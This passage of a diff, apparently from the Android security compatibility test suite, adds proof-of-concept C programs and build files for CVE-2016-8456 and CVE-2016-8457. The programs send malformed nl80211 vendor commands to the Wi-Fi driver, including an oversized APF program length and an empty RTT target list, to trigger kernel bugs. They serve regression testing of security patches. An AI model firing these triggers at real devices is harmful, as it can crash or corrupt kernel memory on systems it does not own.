+ DEBUG_GET_DRIVER_MEM_DUMP,
+ DEBUG_START_PKT_FATE_MONITORING,
+ DEBUG_GET_TX_PKT_FATES,
+ DEBUG_GET_RX_PKT_FATES,
+ DEBUG_GET_WAKE_REASON_STATS,
+ WIFI_OFFLOAD_SUBCMD_START_MKEEP_ALIVE =
+ ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START,
+ WIFI_OFFLOAD_SUBCMD_STOP_MKEEP_ALIVE,
+ APF_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START,
+ APF_SUBCMD_SET_FILTER,
+ /* Add more sub commands here */
+ VENDOR_SUBCMD_MAX
+};
+
+#define QCA_NL80211_VENDOR_ID 0x001374
+#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST 70
+#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM 1
+#define QCA_NL80211_VENDOR_SUBCMD_PACKET_FILTER 83
+
+#define BPF_SET_RESET 1
+#define BPF_FILTER_ID 3
+#define BPF_PACKET_SIZE 4
+#define BPF_PROGRAM 6
+#define QCA_WLAN_GET_PACKET_FILTER 2
+
+#define GSCAN_ATTRIBUTE_NUM_BUCKETS 10
+#define GSCAN_ATTRIBUTE_CH_BUCKET_1 0
+#define GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS 15
+
+#define RTT_ATTRIBUTE_TARGET_CNT 0
+#define RTT_ATTRIBUTE_TARGET_CHAN 5
+#define RTT_ATTRIBUTE_TARGET_INFO 1
+
+#define GSCAN_ATTRIBUTE_WHITELIST_SSID 80
+#define GSCAN_ATTRIBUTE_NUM_WL_SSID 81
+#define GSCAN_ATTRIBUTE_WHITELIST_SSID_ELEM 84
+typedef int wifi_channel;
+typedef int wifi_channel_width_t;
+typedef struct wifi_channel_info {
+ wifi_channel_width_t width;
+ wifi_channel center_freq; /* primary 20 MHz channel */
+ wifi_channel center_freq0; /* center freq (MHz) first segment */
+ wifi_channel
+ center_freq1; /* center freq (MHz) second segment valid for 80 + 80 */
+} wifi_channel_info_t;
+
+#define GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE 111
+#define GSCAN_ATTRIBUTE_ANQPO_HS_LIST 110
+#define GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID 114
+#define GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM 113
+
+#define APF_ATTRIBUTE_PROGRAM_LEN 3
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version);
+int test(void);
+
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version) {
+ struct nl_msg *msg;
+ int ret = -1;
+ unsigned char dst[ETH_ALEN];
+ struct nlattr *rret;
+ struct nlattr *rret2;
+ struct nlattr *rret3;
+ struct nlattr *rret4;
+ unsigned char buf_test[256];
+
+ int i = 0;
+
+ wifi_channel_info_t c_info;
+
+ unsigned char hb_params[512];
+#define DOT11_MAX_SSID_LEN 32
+ unsigned char SSID11[DOT11_MAX_SSID_LEN];
+ struct nl80211_sta_flag_update flags;
+
+ msg = nlmsg_alloc();
+ int if_index = if_nametoindex("wlan0");
+
+#define OUI_GOOGLE 0x001A11
+
+ genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
+
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, OUI_GOOGLE);
+
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, APF_SUBCMD_SET_FILTER);
+
+ rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
+
+ if (!rret) {
+ return 1;
+ }
+
+ nla_put_u32(msg, APF_ATTRIBUTE_PROGRAM_LEN, 0xffffffff);
+
+ nla_nest_end(msg, rret);
+
+ ret = nl_send_auto_complete(nl_sk, msg);
+
+ return 0;
+}
+
+#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
+#define AID_NET_RAW 3004 /* can create raw INET sockets */
+#define AID_NET_ADMIN 3005
+
+int test() {
+ int fd = 0;
+ int i = 0;
+ int j = 0;
+ int ret = 0;
+ char *mem;
+ int family_id = 0;
+ struct audio_cal_basic *acb;
+ struct sockaddr_nl saddr;
+ int test = 0x1234;
+
+ gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
+ setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
+
+ setuid(2000);
+
+ nl_sk = nl_socket_alloc();
+ ret = genl_connect(nl_sk);
+ if (ret != 0) {
+ return -1;
+ }
+
+ family_id = genl_ctrl_resolve(nl_sk, "nl80211");
+
+ ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
+
+ return 0;
+}
+
+int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8456/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8456/Android.mk
new file mode 100644
index 0000000..75688b5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8456/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8456
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SHARED_LIBRARIES := libnl
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8456/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8456/poc.c
new file mode 100644
index 0000000..9367c45
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8456/poc.c
@@ -0,0 +1,313 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <dlfcn.h>
+#include <errno.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <jni.h>
+#include <android/log.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <linux/genetlink.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <sys/types.h>
+#include <netlink/msg.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <linux/nl80211.h>
+
+#define MAX_MSG_SIZE 1024
+#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
+#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
+
+struct kgsl_perfcounter_query_compat {
+ unsigned int groupid;
+ unsigned int countables;
+ unsigned int count;
+ unsigned int max_counters;
+ unsigned int __pad[2];
+};
+struct kgsl_perfcounter_read_group {
+ unsigned int groupid;
+ unsigned int countable;
+ unsigned long long value;
+};
+#define IOCTL_KGSL_PERFCOUNTER_QUERY_COMPAT \
+ _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query_compat)
+
+struct kgsl_perfcounter_read_compat {
+ unsigned int reads;
+ unsigned int count;
+ unsigned int __pad[2];
+};
+
+#define CAL_IOCTL_MAGIC 'a'
+
+#define AUDIO_GET_CALIBRATION _IOWR(CAL_IOCTL_MAGIC, 204, void *)
+
+#define NL80211_ATTR_MAC 6
+#define ETH_ALEN 6
+
+struct nl_sock *nl_sk;
+#define NL80211_ATTR_IFINDEX 3
+enum wlan_hdd_tm_attr {
+ WLAN_HDD_TM_ATTR_INVALID = 0,
+ WLAN_HDD_TM_ATTR_CMD = 1,
+ WLAN_HDD_TM_ATTR_DATA = 2,
+ WLAN_HDD_TM_ATTR_STREAM_ID = 3,
+ WLAN_HDD_TM_ATTR_TYPE = 4,
+ /* keep last */
+ WLAN_HDD_TM_ATTR_AFTER_LAST,
+ WLAN_HDD_TM_ATTR_MAX = WLAN_HDD_TM_ATTR_AFTER_LAST - 1,
+};
+
+enum wlan_hdd_tm_cmd {
+ WLAN_HDD_TM_CMD_WLAN_FTM = 0,
+ WLAN_HDD_TM_CMD_WLAN_HB = 1,
+};
+
+typedef enum {
+ /* don't use 0 as a valid subcommand */
+ VENDOR_NL80211_SUBCMD_UNSPECIFIED,
+
+ /* define all vendor startup commands between 0x0 and 0x0FFF */
+ VENDOR_NL80211_SUBCMD_RANGE_START = 0x0001,
+ VENDOR_NL80211_SUBCMD_RANGE_END = 0x0FFF,
+
+ /* define all GScan related commands between 0x1000 and 0x10FF */
+ ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START = 0x1000,
+ ANDROID_NL80211_SUBCMD_GSCAN_RANGE_END = 0x10FF,
+
+ /* define all RTT related commands between 0x1100 and 0x11FF */
+ ANDROID_NL80211_SUBCMD_RTT_RANGE_START = 0x1100,
+ ANDROID_NL80211_SUBCMD_RTT_RANGE_END = 0x11FF,
+
+ ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START = 0x1200,
+ ANDROID_NL80211_SUBCMD_LSTATS_RANGE_END = 0x12FF,
+
+ ANDROID_NL80211_SUBCMD_TDLS_RANGE_START = 0x1300,
+ ANDROID_NL80211_SUBCMD_TDLS_RANGE_END = 0x13FF,
+
+ ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START = 0x1400,
+ ANDROID_NL80211_SUBCMD_DEBUG_RANGE_END = 0x14FF,
+
+ /* define all NearbyDiscovery related commands between 0x1500 and 0x15FF */
+ ANDROID_NL80211_SUBCMD_NBD_RANGE_START = 0x1500,
+ ANDROID_NL80211_SUBCMD_NBD_RANGE_END = 0x15FF,
+
+ /* define all wifi calling related commands between 0x1600 and 0x16FF */
+ ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START = 0x1600,
+ ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_END = 0x16FF,
+
+ /* define all NAN related commands between 0x1700 and 0x17FF */
+ ANDROID_NL80211_SUBCMD_NAN_RANGE_START = 0x1700,
+ ANDROID_NL80211_SUBCMD_NAN_RANGE_END = 0x17FF,
+
+ /* define all packet filter related commands between 0x1800 and 0x18FF */
+ ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START = 0x1800,
+ ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_END = 0x18FF,
+
+ /* This is reserved for future usage */
+
+} ANDROID_VENDOR_SUB_COMMAND;
+
+enum wl_vendor_subcmd {
+ BRCM_VENDOR_SCMD_UNSPEC,
+ BRCM_VENDOR_SCMD_PRIV_STR,
+ GSCAN_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START,
+ GSCAN_SUBCMD_SET_CONFIG,
+ GSCAN_SUBCMD_SET_SCAN_CONFIG,
+ GSCAN_SUBCMD_ENABLE_GSCAN,
+ GSCAN_SUBCMD_GET_SCAN_RESULTS,
+ GSCAN_SUBCMD_SCAN_RESULTS,
+ GSCAN_SUBCMD_SET_HOTLIST,
+ GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG,
+ GSCAN_SUBCMD_ENABLE_FULL_SCAN_RESULTS,
+ GSCAN_SUBCMD_GET_CHANNEL_LIST,
+ ANDR_WIFI_SUBCMD_GET_FEATURE_SET,
+ ANDR_WIFI_SUBCMD_GET_FEATURE_SET_MATRIX,
+ ANDR_WIFI_RANDOM_MAC_OUI,
+ ANDR_WIFI_NODFS_CHANNELS,
+ ANDR_WIFI_SET_COUNTRY,
+ GSCAN_SUBCMD_SET_EPNO_SSID,
+ WIFI_SUBCMD_SET_SSID_WHITELIST,
+ WIFI_SUBCMD_SET_LAZY_ROAM_PARAMS,
+ WIFI_SUBCMD_ENABLE_LAZY_ROAM,
+ WIFI_SUBCMD_SET_BSSID_PREF,
+ WIFI_SUBCMD_SET_BSSID_BLACKLIST,
+ GSCAN_SUBCMD_ANQPO_CONFIG,
+ WIFI_SUBCMD_SET_RSSI_MONITOR,
+ WIFI_SUBCMD_CONFIG_ND_OFFLOAD,
+ RTT_SUBCMD_SET_CONFIG = ANDROID_NL80211_SUBCMD_RTT_RANGE_START,
+ RTT_SUBCMD_CANCEL_CONFIG,
+ RTT_SUBCMD_GETCAPABILITY,
+ RTT_SUBCMD_GETAVAILCHANNEL,
+ RTT_SUBCMD_SET_RESPONDER,
+ RTT_SUBCMD_CANCEL_RESPONDER,
+ LSTATS_SUBCMD_GET_INFO = ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START,
+ DEBUG_START_LOGGING = ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START,
+ DEBUG_TRIGGER_MEM_DUMP,
+ DEBUG_GET_MEM_DUMP,
+ DEBUG_GET_VER,
+ DEBUG_GET_RING_STATUS,
+ DEBUG_GET_RING_DATA,
+ DEBUG_GET_FEATURE,
+ DEBUG_RESET_LOGGING,
+ DEBUG_TRIGGER_DRIVER_MEM_DUMP,
+ DEBUG_GET_DRIVER_MEM_DUMP,
+ DEBUG_START_PKT_FATE_MONITORING,
+ DEBUG_GET_TX_PKT_FATES,
+ DEBUG_GET_RX_PKT_FATES,
+ DEBUG_GET_WAKE_REASON_STATS,
+ WIFI_OFFLOAD_SUBCMD_START_MKEEP_ALIVE =
+ ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START,
+ WIFI_OFFLOAD_SUBCMD_STOP_MKEEP_ALIVE,
+ APF_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START,
+ APF_SUBCMD_SET_FILTER,
+ /* Add more sub commands here */
+ VENDOR_SUBCMD_MAX
+};
+
+#define QCA_NL80211_VENDOR_ID 0x001374
+#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST 70
+#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM 1
+#define QCA_NL80211_VENDOR_SUBCMD_PACKET_FILTER 83
+
+#define BPF_SET_RESET 1
+#define BPF_FILTER_ID 3
+#define BPF_PACKET_SIZE 4
+#define BPF_PROGRAM 6
+#define QCA_WLAN_GET_PACKET_FILTER 2
+
+#define GSCAN_ATTRIBUTE_NUM_BUCKETS 10
+#define GSCAN_ATTRIBUTE_CH_BUCKET_1 0
+#define GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS 15
+
+#define RTT_ATTRIBUTE_TARGET_CNT 0
+#define RTT_ATTRIBUTE_TARGET_CHAN 5
+#define RTT_ATTRIBUTE_TARGET_INFO 1
+typedef int wifi_channel;
+typedef int wifi_channel_width_t;
+typedef struct wifi_channel_info {
+ wifi_channel_width_t width;
+ wifi_channel center_freq; /* primary 20 MHz channel */
+ wifi_channel center_freq0; /* center freq (MHz) first segment */
+ wifi_channel
+ center_freq1; /* center freq (MHz) second segment valid for 80 + 80 */
+} wifi_channel_info_t;
+
+int test(void);
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version);
+
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version) {
+ struct nl_msg *msg;
+ int ret = -1;
+ unsigned char dst[ETH_ALEN];
+ struct nlattr *rret;
+ struct nlattr *rret2;
+ unsigned char oper_classes[253];
+
+ wifi_channel_info_t c_info;
+
+ unsigned char hb_params[512];
+
+ struct nl80211_sta_flag_update flags;
+
+ msg = nlmsg_alloc();
+ int if_index = if_nametoindex("wlan0");
+
+#define OUI_GOOGLE 0x001A11
+
+ genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
+
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, OUI_GOOGLE);
+
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, RTT_SUBCMD_SET_CONFIG);
+
+ rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
+
+ if (!rret) {
+ return 1;
+ }
+
+ nla_put_u8(msg, RTT_ATTRIBUTE_TARGET_CNT, 0);
+
+ rret2 = nla_nest_start(msg, RTT_ATTRIBUTE_TARGET_INFO);
+
+ if (!rret2) {
+ return 1;
+ }
+
+ nla_put(msg, RTT_ATTRIBUTE_TARGET_CHAN, sizeof(c_info), &c_info);
+
+ nla_nest_end(msg, rret2);
+
+ nla_nest_end(msg, rret);
+
+ ret = nl_send_auto_complete(nl_sk, msg);
+
+ return 0;
+}
+
+#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
+#define AID_NET_RAW 3004 /* can create raw INET sockets */
+#define AID_NET_ADMIN 3005
+
+int test() {
+ int fd = 0;
+ int i = 0;
+ int j = 0;
+ int ret = 0;
+ char *mem;
+ int family_id = 0;
+ struct audio_cal_basic *acb;
+ struct sockaddr_nl saddr;
+ int test = 0x1234;
+
+ gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
+ setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
+
+ setuid(2000);
+
+ nl_sk = nl_socket_alloc();
+ ret = genl_connect(nl_sk);
+ if (ret != 0) {
+ return -1;
+ }
+
+ family_id = genl_ctrl_resolve(nl_sk, "nl80211");
+
+ ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
+
+ return 0;
+}
+
+int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8457/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8457/Android.mk
new file mode 100644
index 0000000..3ec6a31
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8457/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8457
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SHARED_LIBRARIES := libnl
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8457/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8457/poc.c
new file mode 100644
index 0000000..9a9f02b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8457/poc.c
@@ -0,0 +1,335 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <dlfcn.h>
+#include <errno.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <jni.h>
+#include <android/log.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <linux/genetlink.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <sys/types.h>
+#include <netlink/msg.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <linux/nl80211.h>
+
+#define MAX_MSG_SIZE 2048
+#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
+#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
+
+struct kgsl_perfcounter_query_compat {
+ unsigned int groupid;
+ unsigned int countables;
+ unsigned int count;
+ unsigned int max_counters;
+ unsigned int __pad[2];
+};
+struct kgsl_perfcounter_read_group {
+ unsigned int groupid;
+ unsigned int countable;
+ unsigned long long value;
+};
+#define IOCTL_KGSL_PERFCOUNTER_QUERY_COMPAT \
+ _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query_compat)
+
+struct kgsl_perfcounter_read_compat {
+ unsigned int reads;
+ unsigned int count;
+ unsigned int __pad[2];
+};
+
+#define CAL_IOCTL_MAGIC 'a'
+
+#define AUDIO_GET_CALIBRATION _IOWR(CAL_IOCTL_MAGIC, 204, void *)
+
+#define NL80211_ATTR_MAC 6
+#define ETH_ALEN 6
+
+struct nl_sock *nl_sk;
+#define NL80211_ATTR_IFINDEX 3
+enum wlan_hdd_tm_attr {
+ WLAN_HDD_TM_ATTR_INVALID = 0,
+ WLAN_HDD_TM_ATTR_CMD = 1,
+ WLAN_HDD_TM_ATTR_DATA = 2,
+ WLAN_HDD_TM_ATTR_STREAM_ID = 3,
+ WLAN_HDD_TM_ATTR_TYPE = 4,
+ /* keep last */
+ WLAN_HDD_TM_ATTR_AFTER_LAST,
+ WLAN_HDD_TM_ATTR_MAX = WLAN_HDD_TM_ATTR_AFTER_LAST - 1,
+};
+
+enum wlan_hdd_tm_cmd {
+ WLAN_HDD_TM_CMD_WLAN_FTM = 0,
+ WLAN_HDD_TM_CMD_WLAN_HB = 1,
+};
+
+typedef enum {
+ /* don't use 0 as a valid subcommand */
+ VENDOR_NL80211_SUBCMD_UNSPECIFIED,
+
+ /* define all vendor startup commands between 0x0 and 0x0FFF */
+ VENDOR_NL80211_SUBCMD_RANGE_START = 0x0001,
+ VENDOR_NL80211_SUBCMD_RANGE_END = 0x0FFF,
+
+ /* define all GScan related commands between 0x1000 and 0x10FF */
+ ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START = 0x1000,
+ ANDROID_NL80211_SUBCMD_GSCAN_RANGE_END = 0x10FF,
+
+ /* define all RTT related commands between 0x1100 and 0x11FF */
+ ANDROID_NL80211_SUBCMD_RTT_RANGE_START = 0x1100,
+ ANDROID_NL80211_SUBCMD_RTT_RANGE_END = 0x11FF,
+
+ ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START = 0x1200,
+ ANDROID_NL80211_SUBCMD_LSTATS_RANGE_END = 0x12FF,
+
+ ANDROID_NL80211_SUBCMD_TDLS_RANGE_START = 0x1300,
+ ANDROID_NL80211_SUBCMD_TDLS_RANGE_END = 0x13FF,
+
+ ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START = 0x1400,
+ ANDROID_NL80211_SUBCMD_DEBUG_RANGE_END = 0x14FF,
+
+ /* define all NearbyDiscovery related commands between 0x1500 and 0x15FF */
+ ANDROID_NL80211_SUBCMD_NBD_RANGE_START = 0x1500,
+ ANDROID_NL80211_SUBCMD_NBD_RANGE_END = 0x15FF,
+
+ /* define all wifi calling related commands between 0x1600 and 0x16FF */
+ ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START = 0x1600,
+ ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_END = 0x16FF,
+
+ /* define all NAN related commands between 0x1700 and 0x17FF */
+ ANDROID_NL80211_SUBCMD_NAN_RANGE_START = 0x1700,
+ ANDROID_NL80211_SUBCMD_NAN_RANGE_END = 0x17FF,
+
+ /* define all packet filter related commands between 0x1800 and 0x18FF */
+ ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START = 0x1800,
+ ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_END = 0x18FF,
+
+ /* This is reserved for future usage */
+
+} ANDROID_VENDOR_SUB_COMMAND;
+
+enum wl_vendor_subcmd {
+ BRCM_VENDOR_SCMD_UNSPEC,
+ BRCM_VENDOR_SCMD_PRIV_STR,
+ GSCAN_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START,
+ GSCAN_SUBCMD_SET_CONFIG,
+ GSCAN_SUBCMD_SET_SCAN_CONFIG,
+ GSCAN_SUBCMD_ENABLE_GSCAN,
+ GSCAN_SUBCMD_GET_SCAN_RESULTS,
+ GSCAN_SUBCMD_SCAN_RESULTS,
+ GSCAN_SUBCMD_SET_HOTLIST,
+ GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG,
+ GSCAN_SUBCMD_ENABLE_FULL_SCAN_RESULTS,
+ GSCAN_SUBCMD_GET_CHANNEL_LIST,
+ ANDR_WIFI_SUBCMD_GET_FEATURE_SET,
+ ANDR_WIFI_SUBCMD_GET_FEATURE_SET_MATRIX,
+ ANDR_WIFI_RANDOM_MAC_OUI,
+ ANDR_WIFI_NODFS_CHANNELS,
+ ANDR_WIFI_SET_COUNTRY,
+ GSCAN_SUBCMD_SET_EPNO_SSID,
+ WIFI_SUBCMD_SET_SSID_WHITELIST,
+ WIFI_SUBCMD_SET_LAZY_ROAM_PARAMS,
+ WIFI_SUBCMD_ENABLE_LAZY_ROAM,
+ WIFI_SUBCMD_SET_BSSID_PREF,
+ WIFI_SUBCMD_SET_BSSID_BLACKLIST,
+ GSCAN_SUBCMD_ANQPO_CONFIG,
+ WIFI_SUBCMD_SET_RSSI_MONITOR,
+ WIFI_SUBCMD_CONFIG_ND_OFFLOAD,
+ RTT_SUBCMD_SET_CONFIG = ANDROID_NL80211_SUBCMD_RTT_RANGE_START,
+ RTT_SUBCMD_CANCEL_CONFIG,
+ RTT_SUBCMD_GETCAPABILITY,
+ RTT_SUBCMD_GETAVAILCHANNEL,
+ RTT_SUBCMD_SET_RESPONDER,
+ RTT_SUBCMD_CANCEL_RESPONDER,
+ LSTATS_SUBCMD_GET_INFO = ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START,
+ DEBUG_START_LOGGING = ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START,
+ DEBUG_TRIGGER_MEM_DUMP,
+ DEBUG_GET_MEM_DUMP,
+ DEBUG_GET_VER,
+ DEBUG_GET_RING_STATUS,
+ DEBUG_GET_RING_DATA,
+ DEBUG_GET_FEATURE,
+ DEBUG_RESET_LOGGING,
+ DEBUG_TRIGGER_DRIVER_MEM_DUMP,
+ DEBUG_GET_DRIVER_MEM_DUMP,
+ DEBUG_START_PKT_FATE_MONITORING,
+ DEBUG_GET_TX_PKT_FATES,
+ DEBUG_GET_RX_PKT_FATES,
+ DEBUG_GET_WAKE_REASON_STATS,
+ WIFI_OFFLOAD_SUBCMD_START_MKEEP_ALIVE =
